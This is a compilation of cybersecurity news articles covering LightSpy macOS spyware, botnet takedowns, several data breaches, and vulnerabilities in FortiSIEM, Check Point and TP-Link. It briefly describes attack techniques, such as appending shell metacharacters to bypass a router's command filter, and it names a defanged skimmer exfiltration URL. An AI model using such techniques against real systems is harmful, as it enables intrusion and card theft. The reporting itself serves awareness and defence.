Researchers spotted a macOS version of the LightSpy surveillance framework that has been active in the wild since at least January 2024.

Researchers from ThreatFabric discovered a macOS version of the LightSpy spyware that has been active in the wild since at least January 2024.

ThreatFabric observed threat actors using two publicly available exploits (CVE-2018-4233, CVE-2018-4404) to deliver macOS implants. The experts noticed that a portion of the CVE-2018-4404 exploit is likely borrowed from the Metasploit framework.

The macOS version of LightSpy supports 10 plugins to exfiltrate private information from devices.

LightSpy is a modular spyware that has resurfaced after several months of inactivity, the new version supports a modular framework with extensive spying capabilities.

LightSpy can steal files from multiple popular applications like Telegram, QQ, and WeChat, as well as personal documents and media stored on the device. It can also record audio and harvest a wide array of data, including browser history, WiFi connection lists, installed application details, and even images captured by the device’s camera. The malware also grants attackers access to the device’s system, enabling them to retrieve user KeyChain data, device lists, and execute shell commands, potentially gaining full control over the device.

The researchers reported that starting from January 11, 2024, several URLs containing the number “96382741” were uploaded to VirusTotal. These URLs pointed to HTML and JavaScript files published on GitHub, which were related to the CVE-2018-4233 vulnerability. The flaw resides in WebKit and impacts macOS version 10.13.3 and iOS versions before 11.4. The researchers noticed that the number “96382741” was previously used as a path name for hosting LightSpy malware files for both Android and iOS.

“The starting point threat actor group used the same approach as for iOS implant distribution: triggering WebKit vulnerability inside Safari to perform unprivileged arbitrary code execution. For macOS, attackers used CVE-2018-4233 exploit, whose source code was published on the 18th of August 2018.” reads the analysis published by ThreatFabric. “Since the vulnerability affected both iOS and macOS WebKits, both iOS and macOS implants might have been delivered in the same way for some time. The difference was in lateral local privilege escalation, which is OS-specific.”

The plugins for the macOS version are different from those for other platforms, reflecting the architecture of the target systems. Notably, the desktop version has fewer exfiltration functions compared to the mobile version.

On March 21, 2024, the panel content first appeared on VirusTotal, displayed as a web page background. The next day, the panel URL was also found on VirusTotal, it was associated with Android LightSpy. Initial analysis revealed that the panel’s code had a critical mistake: it checked for authorization only after loading all scripts, briefly displaying the authenticated view to unauthorized users.

“However, in the top right corner of the window, there was a button labeled “Remote control platform,” pointing to another panel on the same control server. Due to catastrophic misconfiguration, we were able to access this panel, and anyone could do the same by accessing the top-level panel.” continues the report. “This panel contained comprehensive information about victims, fully correlating with all the exfiltration data provided in the technical analysis section of this report.”

“It became evident that regardless of the targeted platform, the threat actor group focused on intercepting victim communications, such as messenger conversations and voice recordings. For macOS, a specialised plugin was designed for network discovery, aiming to identify devices in proximity to the victim.” concludes the report. “Despite our findings, some aspects of the LightSpy puzzle remain elusive. There is no evidence confirming the existence of implants for Linux and routers, nor is there information on how they might be delivered. However, their potential functionality is known based on panel analysis.”

The researchers also provided indicators of compromise (IoC), for this version of the spyware.

Pierluigi Paganini

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

(SecurityAffairs – hacking, malware)

An international law enforcement operation, called Operation Endgame targeted multiple botnets and their operators.

Between 27 and 29 May 2024, an international law enforcement operation coordinated by Europol, codenamed Operation Endgame, targeted malware droppers like IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot.

The joint actions were carried out by authorities in the Netherlands, Germany, France, Denmark, United States, and the United Kingdom with support from Europol and Eurojust. In addition, with the cooperation of the aforementioned authorities, there have also been police actions in Ukraine, Switzerland, Armenia, Portugal, Romania, Canada, Lithuania and Bulgaria for the arrest or interrogation of suspects, searches or the seizure and downing of servers.

It is the largest operation ever against botnets, crucial in deploying ransomware.

These malicious codes are essential in the attack chain, they act as loaders for additional payloads and some of them are also used to perform post-exploitation activities, including privilege escalation, reconnaissance, and credential theft. 

The operation aimed to disrupt criminal services by arresting key individuals, dismantling infrastructures, and freezing illegal proceeds. Europol states that this operation had a global impact on the dropper ecosystem, which facilitated ransomware and other malicious attacks. Following the operation, eight fugitives linked to these activities will be added to Europe’s Most Wanted list on 30 May 2024. This large-scale operation, led by France, Germany, and the Netherlands, and supported by Eurojust, involved multiple countries and private partners.

“The coordinated actions led to:

• 4 arrests (1 in Armenia and 3 in Ukraine)
• 16 location searches (1 in Armenia, 1 in the Netherlands, 3 in Portugal and 11 in Ukraine)
• Over 100 servers taken down or disrupted in Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the United Kingdom, the United States and Ukraine 
• Over 2 000 domains under the control of law enforcement

Furthermore, it has been discovered through the investigations so far that one of the main suspects has earned at least EUR 69 million in cryptocurrency by renting out criminal infrastructure sites to deploy ransomware.” reads the press release published by EUROPOL. “The suspect’s transactions are constantly being monitored and legal permission to seize these assets upon future actions has already been obtained.

Droppers are used to install other malware into target systems. They serve as the first stage of a malware attack, enabling attackers to deploy harmful programs like viruses, ransomware, or spyware.

Below are the descriptions for the botnets targeted by the operation:

• SystemBC: Facilitates anonymous communication between infected systems and command-and-control servers.
• Bumblebee: Distributed via phishing campaigns or compromised websites, it enables the delivery and execution of further payloads.
• SmokeLoader: Used primarily as a downloader to install additional malicious software.
• IcedID (BokBot): Initially a banking trojan, now used for various cybercrimes, including financial data theft.
• Pikabot: A trojan that provides initial access to infected computers, enabling ransomware deployments, remote takeovers, and data theft.

“Operation Endgame does not end today. New actions will be announced on the website Operation Endgame. In addition, suspects involved in these and other botnets, who have not yet been arrested, will be directly called to account for their actions. Suspects and witnesses will find information on how to reach out via this website.” concludes the announcement.

However, the criminal activity behind the targeted botnets is still continuing, a malware researcher Rohit Bansal that goes online with the handle “R.” warns of a still active server spreading the SystemBC malware.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Endgame)

An international law enforcement operation led by the U.S. DoJ disrupted the 911 S5 botnet and led to the arrest of its administrator.

The U.S. Justice Department led an international law enforcement operation that dismantled the 911 S5 proxy botnet. The law enforcement also arrested its administrator, the 35-year-old Chinese national YunHe Wang, in Singapore. The authorities sanctioned Wang and his co-conspirators. Since 2011, Wang and his co-conspirators had been distributing malware through malicious VPN applications, including MaskVPN, DewVPN, PaladinVPN, ProxyGate, ShieldVPN, and ShineVPN. The compromised devices were recruited in the 911 S5 residential proxy service.

“According to an indictment unsealed on May 24, from 2014 through July 2022, Wang and others are alleged to have created and disseminated malware to compromise and amass a network of millions of residential Windows computers worldwide.” reads the press release published by DoJ. “These devices were associated with more than 19 million unique IP addresses, including 613,841 IP addresses located in the United States. Wang then generated millions of dollars by offering cybercriminals access to these infected IP addresses for a fee.”

According to court documents, the gang bundled the malware with other program files, including pirated versions of licensed software or copyrighted materials. Wang operated approximately 150 dedicated servers worldwide, approximately 76 of which he leased from U.S. based online service providers.

Wang utilized dedicated servers to deploy and manage applications, control infected devices, operate the 911 S5 service, and offer paying customers access to proxied IP addresses associated with these compromised devices.

“As alleged in the indictment, Wang created malware that compromised millions of residential computers around the world and then sold access to the infected computers to cybercriminals,” said Principal Deputy Assistant Attorney General Nicole M. Argentieri, head of the Justice Department’s Criminal Division. “These criminals used the hijacked computers to conceal their identities and commit a host of crimes, from fraud to cyberstalking. Cybercriminals should take note. Today’s announcement sends a clear message that the Criminal Division and its law enforcement partners are firm in their resolve to disrupt the most technologically sophisticated criminal tools and hold wrongdoers to account.”

The FBI has published information at fbi.gov/911S5 to help identify and remove 911 S5’s VPN applications from your devices or machines.

The FBI shared instructions on how to identify and remove VPN Applications containing the 911 S5 bot.

Cybercriminals used 911 S5 to hide their real IP addresses and locations while committing various crimes, including financial fraud, stalking, bomb threats, illegal exportation of goods, and child exploitation. Since 2014, 911 S5 has allegedly helped cybercriminals bypass financial fraud detection systems, leading to billions of dollars in theft from financial institutions, credit card issuers, and federal lending programs.

During the pandemic, crooks used the botnet to target relief programs, resulting in significant fraud. The U.S. estimates that 560,000 fraudulent unemployment claims, amounting to over $5.9 billion, originated from compromised IP addresses. Additionally, over 47,000 Economic Injury Disaster Loan (EIDL) applications were linked to these IP addresses, causing millions in losses for financial institutions.

The 911 S5 client software, hosted on U.S. servers, allowed cybercriminals outside the U.S. to purchase goods with stolen credit cards and illegally export them, violating U.S. export laws. The software may also contain encryption or features subject to export controls under the Export Administration Regulations (EAR), potentially leading to further legal violations by foreign nationals downloading it without a license.

“The indictment further alleges that from 2018 until July 2022, Wang received approximately $99 million from his sales of the hijacked proxied IP addresses through his 911 S5 operation, either in cryptocurrency or fiat currency.” continues DoJ. “Wang used the illicitly gained proceeds to purchase real property in the United States, St. Kitts and Nevis, China, Singapore, Thailand, and the United Arab Emirates. The indictment identifies dozens of assets and properties subject to forfeiture, including a 2022 Ferrari F8 Spider S-A, a BMW i8, a BMW X7 M50d, a Rolls Royce, more than a dozen domestic and international bank accounts, over two dozen cryptocurrency wallets, several luxury wristwatches, 21 residential or investment properties (across Thailand, Singapore, the U.A.E., St. Kitts and Nevis, and the United States), and 20 domains.“

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) issued sanctions against Yunhe Wang, and other two Chinese nationals, Jingping Liu and Yanni Zheng, for their role in criminal activities associated with the 911 S5 botnet. Additionally, OFAC sanctioned three entities—Spicy Code Company Limited, Tulip Biz Pattaya Group Company Limited, and Lily Suites Company Limited—due to their ownership or control by Yunhe Wang.

Yunhe Wang faces a maximum penalty of 65 years in prison if convicted on all counts. These charges include conspiracy to commit computer fraud, substantive computer fraud, conspiracy to commit wire fraud, and conspiracy to commit money laundering.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, 911 S5 botnet)

Identity and access management firm Okta warns of credential stuffing attacks targeting the Customer Identity Cloud (CIC) feature.

Okta warns of credential stuffing attacks targeting its Customer Identity Cloud (CIC) feature since April.

A credential stuffing attack is a type of cyber attack where hackers use large sets of username and password combinations, typically obtained from previous data breaches, phishing campaigns, or info-stealer infections, to gain unauthorized access to user accounts on various online services. Credential stuffing attacks exploit the widespread practice of using the same login credentials across multiple online accounts. Attackers automate the process of trying these credentials on various websites until they find a match, granting them unauthorized access to compromised accounts. This method poses a risk of exposing sensitive data or enabling fraudulent activities.

The identity and access management firm observed suspicious activity that started on April 15. 

The advisory published by the company states that the attacks targeted the endpoints supporting the cross-origin authentication feature, the attacks hit several customers.

“Okta has determined that the cross-origin authentication feature in Customer Identity Cloud (CIC) is prone to being targeted by threat actors orchestrating credential-stuffing attacks.” reads advisory. “For context, we observed that the endpoints used to support the cross-origin authentication feature being attacked via credential stuffing for a number of our customers.”

Cross-Origin Resource Sharing (CORS) (opens new window)is a mechanism that allows a web page to make an AJAX call using XMLHttpRequest (XHR) (opens new window). Use XHR to call a domain that is different than the domain where the script was loaded. Such cross-domain requests would otherwise be forbidden by web browsers as indicated by the same origin security policy (opens new window). CORS defines a standardized (opens new window)way in which the browser and the server can interact to determine whether to allow the cross-origin request.

The company notified the targeted customers that have this feature enabled, it also recommends disabling targeted URLs if they are not in use.

Okta recommends reviewing suspicious activity from April 15 forward, it suggests reviewing the following log events:

• fcoa – Failed cross-origin authentication
• scoa – Successful cross-origin authentication
• pwd_leak – Someone attempted to login with a leaked password

At the end of April, Okta observed a surge in credential stuffing attacks against online services, aided by the widespread availability of residential proxy services, lists of previously compromised credentials (“combo lists”), and automation tools.

From April 19, 2024 through to April 26, 2024, the Okta Identity Threat Research team observed a spike in credential stuffing activity against user accounts from what appears to be similar infrastructure.

The latest advisory includes recommendations to mitigate these attacks.

The company also shared recommendations on how to best protect customers from credential-stuffing attacks.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Okta)

Check Point released hotfixes for a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively exploited in attacks in the wild.

Check Point released hotfixes to address a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively being exploited in attacks in the wild.

The vulnerability CVE-2024-24919 is a Quantum Gateway information disclosure issue. Threat actors exploited the flaw to gain remote firewall access and breach corporate networks.

The issue impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances. Impacted versions are R80.20.x, R80.20SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

Early this week, the security firm warned of a surge in attacks aimed at VPN solutions.

“We have recently witnessed compromised VPN solutions, including various cyber security vendors. In light of these events, we have been monitoring attempts to gain unauthorized access to VPNs of Check Point’s customers. By May 24, 2024 we identified a small number of login attempts using old VPN local-accounts relying on unrecommended password-only authentication method,” the company said.

“We have recently witnessed compromised VPN solutions, including various cyber security vendors. In light of these events, we have been monitoring attempts to gain unauthorized access to VPNs of Check Point’s customers.” reads the initial advisory published by the vendor.

“By May 24, 2024 we identified a small number of login attempts using old VPN local-accounts relying on unrecommended password-only authentication method.”

The company started investigating the attacks by assembling special teams of Incident Response, Research, Technical Services and Products professionals. The experts found within 24 hours a few potential customers which were attacked.

On May 28, the experts discovered how attackers were targeing its customers and released a fix for Check Point Network Security gateways.

“The vulnerability potentially allows an attacker to read certain information on Internet-connected Gateways with remote access VPN or mobile access enabled. The attempts we’ve seen so far, as previously alerted on May 27, focus on remote access scenarios with old local accounts with unrecommended password-only authentication.” reads an update to the initial advisory. “Within a few hours of this development, Check Point released an easy to implement solution that prevents attempts to exploit this vulnerability. To stay secure, customers should follow these simple instructions to deploy the provided solution.”

The company also released hotfixes that address the flaw in end-of-life (EOL) versions.

Check Point set up FAQ page to provide information about CVE-2024-24919, such as what customers should do if they suspect unauthorized access attempts.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Check Point VPN zero-day)

The cybercrime forum BreachForums has been resurrected two weeks after a law enforcement operation that seized its infrastructure.

The cybercrime forum BreachForums is online again, recently a US law enforcement operation seized its infrastructure and took down the platform.

The platform is now reachable at breachforums[.]st, which was one of the domains used in the past by the cybercrime forum.

The admin, who is using the moniker ShinyHunters, announced the return:

It is unclear if the current administrator is the notorious ShinyHunters hacker who operated from the platform before the law enforcement operation.

ShinyHunters claimed the hack of Ticketmaster and offered for sale 1.3 TB of data, including full details of 560 million customers, for $500,000. Stolen data includes names, emails, addresses, phone numbers, ticket sales, and order details.

CyberKnown researchers speculate the Ticketmaster data breach claim has provided BreachForums with the quick attention they need to boost their user numbers and reputation.

Hackread.com reported that ShinyHunters regained control of domains despite the FBI’s efforts, exposing notable operational setbacks and security lapses. However, we cannot exclude that the site is a honeypot set up by the feds.

From June 2023 until May 2024, BreachForums (hosted at breachforums.st/.cx/.is/.vc) was run by the notorious actor ShinyHunters.

From March 2022 until March 2023, a separate version of BreachForums (hosted at breached.vc/.to/.co) was run by the threat actor Pompompurin. In July 2023, the owner of the BreachForums Conor Brian Fitzpatrick, aka Pompompurin, pleaded guilty to hacking charges.

In March 2023, U.S. law enforcement arrested Pompompurin, the agents spent hours inside and outside the suspect’s home and were seen removing several bags of evidence from the house.

The man has been charged with soliciting individuals with the purpose of selling unauthorized access devices. Fitzpatrick was released on a $300,000 bond signed by his parents.

The BreachForums hacking forum was launched in 2022 after the law enforcement authorities seized RaidForums as a result of Operation TOURNIQUET. pompompurin always declared that he was ‘not affiliated with RaidForums in any capacity,’

Raidforums (hosted at raidforums.com and run by Omnipotent) was the predecessor hacking forum to both version of BreachForums and ran from early 2015 until February 2022.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

(SecurityAffairs – hacking, malware)

Dutch bank ABN Amro discloses data breach following a ransomware attack hit the third-party services provider AddComm.

Dutch bank ABN Amro disclosed a data breach after third-party services provider AddComm suffered a ransomware attack. AddComm distributes documents and tokens physically and digitally to clients and employees.

The ransomware attack occurred last week and unauthorized parties may have obtained access to data of a limited number of ABN AMRO clients. ABN AMRO is going to contact the impacted clients and notified the Dutch Data Protection Authority and regulators.

At the time of this writing, AddComm has contained the incident, the impacted systems have been restored, and the company has locked out the attackers. AddComm has yet to determine what type of data may have been stolen during the attack. However, the company is investigating the incident with the help of external security experts working for AddComm.

The Dutch bank has stopped using services provided by AddComm.

At the moment, there are no indications that attackers have used the data of ABN AMRO clients. The bank also warns clients to stay alert to phishing messages.

The bank added that its systems have not been affected by the ransomware attack.

“External cybersecurity experts are currently investigating exactly what data has been stolen at AddComm. We are writing to customers whose data may be involved in this attack.” states the bank.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Auction house Christie disclosed a data breach following a RansomHub cyber attack that occurred this month.

Auction house Christie’s disclosed a data breach after the ransomware group RansomHub threatened to leak stolen data. The security breach occurred earlier this month.

The website of the auction house was unreachable after the attack.

According to BBC, Christie had problems in selling art and other high-value items worth an estimated $840 million due to a cyberattack. The spring auctions include a Vincent van Gogh painting valued at $35 million and rare wine, among other lots.

Some sales have been delayed due to the cyber attack.

RansomHub claimed responsibility for the attack and added the company to its Tor leak site. The extortion group said they had stolen 2GB of sensitive information, including personal information belonging to at least 500,000 Christie’s clients.

“While utilizing access to Christies network we were able to gain access to their customers sensitive personal information including [BirthPlace MRZFull DocumentNumber BirthDate ExpiryDate FirstName LastName IssueDate IssuingAuthority Sex DocumentCategory DocumentType NationalityName] as well as address, hieght, race and much more sensitive information for at least 500,000 of their private clients from all over the world.” states the group.

The group is threatening to leak the stolen data if the victim will not pay the ransom by Sunday, June 2,024.

The gang said it has attempted to negotiate the payment with the auction house without success. The gang added that after they will post stolen data, Christie will incur heavy fines from GDPR.

“Earlier this month Christie’s experienced a technology security incident. We took swift action to protect our systems, including taking our website offline” “Our investigations determined there was unauthorized access by a third party to parts of Christie’s network.” a company spokesman told BleepingComputer. “They also determined that the group behind the incident took some limited amount of personal data relating to some of our clients.”

The auction house is notifying privacy regulators and law enforcement, it is also going to inform impacted clients.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Researchers released a proof-of-concept (PoC) exploit for remote code execution flaw CVE-2024-23108 in Fortinet SIEM solution.

Security researchers at Horizon3’s Attack Team released a proof-of-concept (PoC) exploit for a remote code execution issue, tracked as CVE-2024-23108, in Fortinet’s SIEM solution. The PoC exploit allows executing commands as root on Internet-facing FortiSIEM appliances.

In February, cybersecurity vendor Fortinet warned of two critical vulnerabilities in FortiSIEM, tracked as CVE-2024-23108 and CVE-2024-23109 (CVSS score 10), which could lead to remote code execution.

“Multiple improper neutralization of special elements used in an OS Command vulnerability [CWE-78] in FortiSIEM supervisor may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests.” reads the advisory published by Fortinet.

The affected products are:

• FortiSIEM version 7.1.0 through 7.1.1
• FortiSIEM version 7.0.0 through 7.0.2
• FortiSIEM version 6.7.0 through 6.7.8
• FortiSIEM version 6.6.0 through 6.6.3
• FortiSIEM version 6.5.0 through 6.5.2
• FortiSIEM version 6.4.0 through 6.4.2

The CERT-EU also published an advisory for the above vulnerabilities:

“In February 2024, Fortinet quietly updated a 2023 advisory, joining two critical flows to the list of OS Command vulnerabilities affecting its FortiSIEM product. If exploited, these vulnerabilities could allow a remote unauthenticated attacker to execute commands on the system.” reads the advisory published by CERT-EU. “Updating is recommended as soon as possible.”

This week, Horizon3’s Attack Team also published a technical analysis of the vulnerability.

“While the patches for the original PSIRT issue, FG-IR-23-130, attempted to escape user-controlled inputs at this layer by adding the wrapShellToken() utility, there exists a second order command injection when certain parameters to datastore.py are sent. There” reads the analysis.

The researchers noticed that the logs for the phMonitor service, located at /opt/phoenix/logs/phoenix.log, provide detailed records of received messages. Any exploitation attempt of CVE-2024-23108 will generate log entries indicating a failed command with “datastore.py nfs test.” These lines should be used as indicators of compromise to detect exploitation attempts.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, SIEM)

Threat actors are exploiting a WordPress plugin to insert malicious PHP code in e-commerce sites and steal credit card data.

Sucuri researchers observed threat actors using a PHP snippet WordPress plugin to install malicious code in WooCommerce e-stores and harvest credit card details.

In the campaign spotted by the experts, attackers use a very obscure WordPress plugin called Dessky Snippets, which has only a few hundred active installations at the time of writing.

Dessky Snippets is a lightweight and simple plugin that gives users the ability to easily add custom PHP code from WordPress admin.

The campaign occurred on May 11th, and the researchers observed a surge in downloads of the Dessky Snippets plugin from that same day. At this time, the WordPress plugin has over 200 active installations.

Attackers exploited the Dessky Snippets plugin to insert a server-side PHP credit card e-skimmer.

“This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code.” reads the analysis published by Sucuri.

The malware has two main components. The first part uses a fake function named “twentytwenty_get_post_logos()” to hook into WooCommerce’s billing form. The function adds additional fields to the billing form to request credit card details earlier than usual. The second part involves an obfuscated credit card skimmer that monitors POST data for specific parameters. When the malware detects these parameters, it sends all the collected billing and credit card information to a third-party URL “hxxps://2of[.]cc/wp-content/”.

The researchers noticed that the billing form associated with the overlay used by the attackers has the autocomplete feature disabled, The fields are set with autocomplete=”off”.

Disabling the auto-fill feature on the fake checkout form is an evasion trick that reduces the chances of the browser warning users about entering sensitive information. The fields remain blank until manually filled out, making them look like regular, necessary inputs for the transaction and reducing user suspicion.

“In essence, ecommerce sites are prime targets for hackers due to the valuable data they handle.” concludes the report. “Here’s a simple guide to protect your online store:

1. Keep your software patched: Regularly update your CMS, plugins, themes, and any third-party components to patch vulnerabilities.
2. Use strong passwords: Ensure all accounts, including admin, sFTP, and database credentials, have strong and unique passwords.
3. Select trusted scripts: Only integrate third-party JavaScript from reputable sources. Avoid unnecessary third-party scripts.
4. Monitor for threats: Regularly check your site for signs of malware, unauthorized changes, or any indicators of compromise.
5. Implement a firewall: Use a web application firewall to block malicious bots, virtually patch known vulnerabilities, and filter harmful traffic.
6. Set up a CSP: Establish a Content Security Policy (CSP) to protect against clickjacking, cross-site scripting (XSS), and other threats.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)

Researchers warn of a critical remote code execution vulnerability in TP-Link Archer C5400X gaming router.

Researchers at OneKey discovered a a critical remote code execution (RCE) vulnerability, tracked as CVE-2024-5035 (CVSS score 10.0), in TP-Link Archer C5400X gaming router.

A remote, unauthenticated, attacker can exploit the vulnerability to execute commands on the device.

The TP-Link Archer C5400X is a high-performance gaming router designed for demanding applications such as online gaming and streaming.

The vulnerability resides in a binary called “rftest” that is executed during device startup. The researchers discovered that the binary exposes a network service that is susceptible to unauthenticated command injection and buffer overflows on TCP ports 8888, 8889, and 8890

“By successfully exploiting this flaw, remote unauthenticated attacker can gain arbitrary command execution on the device with elevated privileges.” reads the report published by the OneKey. “It’s unclear whether the binary is always launched and whether it is always exposed on LAN/WAN interfaces. We reproduced the issue within an emulator, but production device may behave differently. We put our trust in TP-Link in assessing the actual exposure of this vulnerability.“

The experts noticed that upon executing the binary, it starts a TCP server on port 8888, accepting commands from clients. The binary only accepts commands starting with “wl” or “nvram get”. However, this limitation can be bypassed for command injection by appending shell meta-characters like “;”, “&”, or “|”.

TP-Link addressed the issue by discarding any command containing shell meta-characters.

The issue affects firmware versions, through 1.1.1.6, Archer C5400X(EU)_V1_1.1.7 Build 20240510 addressed the flaw.

Below is the timeline for this flaw:

• 2024-02-16 –Report submitted to TP-Link PSIRT through encrypted email.
• 2024-02-19 –Case opened by TP-Link PSIRT.
• 2024-04-10 –TP-Link shares a beta version of 1.1.7p1 for validation.
• 2024-04-17 –Patch confirmed by ONEKEY.
• 2024-05-27 –Release ONEKEY advisory in coordination with TP-Link

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, TP-Link Archer C5400X)

Prescription service firm Sav-Rx disclosed a data breach that potentially impacted over 2.8 million people in the United States.

Prescription service company Sav-Rx disclosed a data breach after 2023 cyberattack. The company is notifying 2,812,336 individuals impacted by the security breach in the United States.

A&A Services, which operates as Sav-RX, shared with the Maine Attorney General’s office the data breach notification letter sent to the impacted individuals.

The investigation conducted by the company with the help of external cybersecurity experts revealed that threat actors first gained access to the IT System on or around October 3, 2023.

“On October 8, 2023, we identified an interruption to our computer network. As a result, we immediately took steps to secure our systems and engaged third-party cybersecurity experts. Our information technology systems (“IT System”) were restored the next business day, and prescriptions were shipped on time without delay.” reads the letter sent to the impacted individuals. “As part of the investigation, we learned that an unauthorized third party was able to access certain non-clinical systems and obtained files that contained health information. After an extensive review with third-party experts, on April 30, 2024, we discovered that some of the data accessed or acquired by the unauthorized third party may have contained your protected health information.”

Compromised data includes full name, date of birth, Social Security Number (SSN), email address, physical address, phone number, eligibility data, and insurance identification number.

Sav-Rx took eight months to notify impacted individuals to avoid impacting patient care with its investigation.

“Our initial priority was restoring systems to minimize any interruption to patient care.” states the company. “The incident did not affect our pharmacy systems, including those systems related to our mail order pharmacy. Not all customers were impacted, and not all health plan participants were impacted.”

The company promptly notified law enforcement authorities. Sav-Rx worked with external cybersecurity experts to contain the incident and ensure any data stolen from the company was destroyed and not further disseminated.

The firm pointed out that the incident had a limited impact on its operations, its IT system was restored
the next business day and there was no delay in the shipment of prescriptions.

The prescription service provider also announced it has enhanced its security protocols, controls, technology, and training.

Sav-Rx is offering impacted individuals complimentary access to 24 months of credit monitoring and identity theft restoration services provided by Equifax.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Organizations had to re-examine the traditional business perimeter and migrate to cloud-based tools to support distributed workforces. What is the impact?

The almost overnight shift to remote work, driven by the COVID-19 pandemic, has profoundly impacted how businesses use technology. Organizations across the globe had to adapt and adapt quickly.  They had to re-examine the traditional business perimeter and migrate to cloud-based tools to support distributed workforces.

Cloud-based applications and services can be accessed from anywhere via an internet connection, facilitating seamless collaboration among remote workers. The cloud can be scaled up or down based on demand, providing the flexibility to support varying workloads and user numbers and eliminating the danger of under or over-provisioning.

In addition, by moving to the cloud, companies can reduce the capital expenditure associated with maintaining on-premises infrastructure. Cloud-based tools such as Microsoft Teams, Slack, and Google Workspace also boost collaboration and communication among remote teams, driving productivity and innovation.

Cloud Security Challenges

However, adopting cloud computing significantly expanded the attack surface for businesses, effectively dissolving the traditional network perimeter. This shift introduced new vulnerabilities, and conventional security measures designed to protect a well-defined, centralized perimeter were no longer enough.

Enterprises typically use multiple cloud services from a wide range of vendors for business applications, development environments, and IT infrastructure management. This multi or hybrid cloud strategy can introduce unexpected complexities and challenges, which are exacerbated when different business units and teams adopt cloud solutions without the approval or knowledge of the central IT department.

Storing data in the cloud also comes with a heightened risk of data breaches. These environments house a significant amount of valuable and sensitive information, making them attractive to malicious actors. Moreover, cloud platforms store vast amounts of data in centralized repositories, and this concentration of data creates a single point of failure that, if breached, can lead to major data loss and exposure.

Cloud environments are also highly dynamic, complex, and distributed, which can obscure visibility into assets, data flows, and security postures. Furthermore, many cloud services operate on a multi-tenant model, where multiple customers share the same infrastructure. Although cloud providers implement stringent isolation mechanisms, the shared nature of the infrastructure can introduce vulnerabilities that, if exploited, can affect multiple customers.

In addition to these challenges, cloud security adds a new form of security alert for analysts to triage and investigate, adding to the overall costs. Managing cloud alerts effectively requires overcoming the unique complexities introduced by cloud architectures. The sheer volume of alerts generated by various cloud resources can easily overwhelm security teams. Each cloud service has its own set of security and audit logs, which often provide data in non-standard formats, adding to the complexity of monitoring and analysis.

Furthermore, the lack of clear visibility across different cloud platforms and services can hinder effective response strategies, as security teams struggle to correlate alerts across a fragmented ecosystem. This situation demands robust automation and integration of security tools to ensure comprehensive coverage and swift response to potential threats in cloud environments.

Compliance Across Jurisdictions

Compliance is another challenge. Ensuring compliance with industry regulations and standards in a cloud environment can be complex. Different industries and regions have specific regulatory requirements, such as the General Data Protection Regulation (GDPR) for data protection in the EU, the Health Insurance Portability and Accountability Act (HIPAA) for healthcare information in the US, and the Payment Card Industry Data Security Standard (PCI-DSS) for credit card information. These regulations have unique requirements for data handling, security controls, and reporting.

The cloud landscape constantly evolves, with new services, features, and configurations continuously introduced. Maintaining compliance in a dynamic setting requires continuous monitoring and adaptation to ensure that all deployed services comply with regulatory standards.

Misconfigurations Exposing Data

Cloud misconfigurations are another major cause of security vulnerabilities. They often result from human error or a lack of understanding of complex cloud environments. These misconfigurations can expose sensitive data and systems to unauthorized access and breaches.

For example, setting overly permissive access controls can inadvertently expose sensitive data to the public internet or unauthorized users. This could include misconfigured storage buckets, databases, and virtual machines. Also, failure to change default security settings can leave cloud resources vulnerable to exploitation. Default settings often lack adequate security and should be customized to meet the organization’s specific security requirements.

 Poor network segmentation is another culprit, and once bad actors gain a foothold, it can allow them to move laterally within a cloud environment. Properly segmenting networks can contain potential breaches and limit the spread of attacks.

Understanding Responsibilities

Security in the cloud operates on a shared responsibility model, where the cloud service provider and the customer have distinct security obligations. This model outlines security duties, ensuring that both parties contribute to a secure cloud environment.

Cloud service providers are typically responsible for the security of the cloud infrastructure, including physical security, network infrastructure, and the hypervisor layer. They ensure that the foundational services are secure and reliable. However, customers are responsible for securing their data, managing user access, and configuring security settings for their applications and services that run in the cloud.

Organizations must clearly understand their responsibilities within this model to implement appropriate security measures. This includes data encryption, identity and access management, regular patching, and compliance with relevant regulatory requirements. Failure to understand and act upon these responsibilities can lead to security vulnerabilities and data breaches.

A Proactive Approach

The shift to remote work and the migration to cloud-based solutions have transformed the traditional security perimeter. While these trends offer numerous benefits, they also introduce new challenges and risks.

Traditional security approaches, which rely on static defenses, are insufficient to address the evolving threat landscape in the cloud. The cloud’s dynamic and interconnected nature demands a more automated approach, where the SOC teams enforce security best practices that emphasize efficiency in threat detection using AI-enabled automation tools.

By adopting a proactive approach to security, organizations can successfully navigate this new world and ensure the secure and efficient operation of their distributed workforces. 

